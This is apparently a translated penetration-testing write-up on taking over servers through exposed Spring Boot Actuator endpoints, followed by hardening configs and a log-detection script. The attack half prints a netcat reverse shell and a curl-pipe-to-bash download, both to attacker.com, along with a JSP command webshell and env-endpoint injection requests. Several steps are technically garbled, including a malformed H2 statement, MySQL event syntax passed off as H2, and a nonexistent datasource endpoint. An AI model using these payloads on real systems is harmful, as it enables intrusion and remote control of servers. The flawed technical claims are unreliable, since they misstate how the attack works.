# Spring Boot Actuator: An Example Analysis from Unauthorized Access to Getshell
## 0x00 Preface
Spring Boot Actuator is a production-grade feature module provided by Spring Boot for monitoring and managing applications. When it is misconfigured, however, the sensitive endpoints it exposes can become the entry point through which an attacker breaks through the system's defenses. This article walks through a complete penetration-testing case and analyzes in detail how an Actuator unauthorized-access vulnerability can be escalated step by step to server privileges.
## 0x01 Vulnerability Background
### 1.1 Overview of Actuator Endpoints
Spring Boot Actuator provides the following key endpoints by default (partial list):
```plaintext
/actuator/health   - application health status
/actuator/env      - environment variable information
/actuator/beans    - all Spring beans
/actuator/mappings - URL route mappings
/actuator/heapdump - heap memory dump
```
A typical configuration that leads to the vulnerability:
```yaml
# application.yml misconfiguration example
management:
  endpoints:
    web:
      exposure:
        include: "*"   # exposes all endpoints
  endpoint:
    health:
      show-details: always
```
Scanning with automated tools reveals suspicious endpoints:
```plaintext
$ curl http://target.com/actuator
{
  "_links":{
    "env":{"href":"/actuator/env"},
    "heapdump":{"href":"/actuator/heapdump"},
    "mappings":{"href":"/actuator/mappings"}
  }
}
```
Accessing the env endpoint to obtain key configuration:
```plaintext
$ curl http://target.com/actuator/env
{
  "activeProfiles":["prod"],
  "propertySources":[
    {
      "name":"systemEnvironment",
      "properties":{
        "DATABASE_PASSWORD":{"value":"P@ssw0rd123!"},
        "API_KEY":{"value":"sk_live_abcdef123456"}
      }
    }
  ]
}
```
Downloading the heap dump and analyzing it offline:
```plaintext
wget http://target.com/actuator/heapdump -O memory.hprof
// plaintext password found in the database connection pool
org.apache.tomcat.dbcp.dbcp2.BasicDataSource
  -> connectionProperties = {user=admin, password=Admin@123}
```
Modifying the runtime configuration through the env endpoint:
```http
POST /actuator/env HTTP/1.1
Content-Type: application/json

{
  "name":"spring.datasource.tomcat.validation-query",
  "value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"success\";}';"
}

POST /actuator/refresh HTTP/1.1

GET /actuator/datasource?query=EXEC('nc+-e+/bin/bash+attacker.com+4444') HTTP/1.1
```
Exploiting the SQL injection characteristics of the H2 database:
```sql
CREATE TABLE shell(
  id int primary key,
  content varchar(255)
AS VALUES(1, '<%@page import="java.util.*,java.io.*"%><% if(request.getParameter("cmd")!=null){Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));String line;while((line=br.readLine())!=null){out.println(line);}}%>')
```
Injection via a cron expression:
```http
POST /actuator/env HTTP/1.1
Content-Type: application/json

{
  "name":"spring.datasource.hikari.connection-init-sql",
  "value":"CREATE EVENT IF NOT EXISTS backdoor ON SCHEDULE EVERY 1 MINUTE DO CALL EXEC('curl http://attacker.com/shell.sh | bash')"
}
```
Hardened configuration (application.yml):
```yaml
management:
  endpoints:
    web:
      exposure:
        include: health,info   # expose only the necessary endpoints
      base-path: /internal     # change the default path
  endpoint:
    shutdown:
      enabled: false
```
Requiring authentication for every Actuator endpoint with Spring Security:
```java
import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;

@Configuration
public class ActuatorSecurity extends WebSecurityConfigurerAdapter {
    @Override
    protected void configure(HttpSecurity http) throws Exception {
        // match only Actuator endpoints and require the ADMIN role over HTTP Basic auth
        http.requestMatcher(EndpointRequest.toAnyEndpoint())
            .authorizeRequests().anyRequest().hasRole("ADMIN")
            .and().httpBasic();
    }
}
```
Restricting access at the nginx reverse proxy:
```nginx
location ~ ^/actuator {
    allow 192.168.1.0/24;
    deny all;
    auth_basic "Restricted";
    auth_basic_user_file /etc/nginx/.htpasswd;
}
```
Malicious request patterns to monitor:
- High-frequency access to the /actuator/env endpoint
- POST requests that modify the runtime configuration
- Scanning behaviour with unusual User-Agent strings
Corresponding log entries:
```plaintext
2023-07-15 14:32:17 WARN o.s.b.a.e.web.EndpointLinksResolver - Potential malicious access attempt from 45.33.12.8 to /actuator/heapdump
2023-07-15 14:33:45 ERROR o.a.c.c.C.[.[.[/].[dispatcherServlet] - Servlet.service() for servlet [dispatcherServlet] threw exception: org.springframework.security.authentication.BadCredentialsException
```
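The three patterns listed above, turned into a small detection routine that runs over access-log lines. This is an added example, not code from the article; the thresholds, the scanner User-Agent markers and the sample log lines are assumptions constructed for it.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Thresholds and scanner User-Agent markers are assumptions for this example, not values from the article.
ENV_HITS_PER_WINDOW = 5          # a 6th /actuator/env request from one client inside WINDOW is "high frequency"
WINDOW = timedelta(minutes=1)
SCANNER_UA_MARKERS = ("python-requests", "nuclei", "sqlmap", "masscan")
CONFIG_WRITE_PATHS = ("/actuator/env", "/actuator/refresh")

# Combined-format access-log lines constructed for this example (not real traffic).
SAMPLE_LOG = """\
45.33.12.8 - - [15/Jul/2023:14:32:01 +0000] "GET /actuator/env HTTP/1.1" 200 812 "-" "python-requests/2.31"
45.33.12.8 - - [15/Jul/2023:14:32:03 +0000] "GET /actuator/env HTTP/1.1" 200 812 "-" "python-requests/2.31"
45.33.12.8 - - [15/Jul/2023:14:32:05 +0000] "GET /actuator/env HTTP/1.1" 200 812 "-" "python-requests/2.31"
45.33.12.8 - - [15/Jul/2023:14:32:07 +0000] "GET /actuator/env HTTP/1.1" 200 812 "-" "python-requests/2.31"
45.33.12.8 - - [15/Jul/2023:14:32:09 +0000] "GET /actuator/env HTTP/1.1" 200 812 "-" "python-requests/2.31"
45.33.12.8 - - [15/Jul/2023:14:32:11 +0000] "GET /actuator/env HTTP/1.1" 200 812 "-" "python-requests/2.31"
10.0.0.7 - - [15/Jul/2023:14:33:40 +0000] "POST /actuator/env HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.20 - - [15/Jul/2023:14:33:50 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "kube-probe/1.27"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                     r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$')


def detect(log_text):
    """Apply the three patterns above; returns a sorted list of (rule, client_ip) alerts."""
    alerts, env_hits = set(), defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["path"].startswith("/actuator"):
            continue                      # unparseable, or unrelated to Actuator
        ip, method, path, ua = m["ip"], m["method"], m["path"].split("?")[0], m["ua"]
        if method == "POST" and path in CONFIG_WRITE_PATHS:
            alerts.add(("runtime_config_write", ip))
        if any(marker in ua for marker in SCANNER_UA_MARKERS):
            alerts.add(("scanner_user_agent", ip))
        if path == "/actuator/env":
            env_hits[ip].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
    # sliding window over each client's /actuator/env timestamps
    for ip, times in env_hits.items():
        times.sort()
        if any(times[i] - times[i - ENV_HITS_PER_WINDOW] <= WINDOW
               for i in range(ENV_HITS_PER_WINDOW, len(times))):
            alerts.add(("env_high_frequency", ip))
    return sorted(alerts)


if __name__ == "__main__":
    for rule, ip in detect(SAMPLE_LOG):
        print(f"{rule}: {ip}")
```

The health-probe line from 192.168.1.20 produces no alert, which is the behaviour you want for a legitimate monitoring client.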
Secure startup check example:
```java
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

@SpringBootApplication
public class Application {
    public static void main(String[] args) {
        SpringApplication app = new SpringApplication(Application.class);
        app.setAddCommandLineProperties(false); // disallow overriding properties from command-line arguments
        app.run(args);
    }
}
```
Note: the techniques described in this article are for security research only and must not be used for illegal purposes. Obtain written authorization before any actual testing.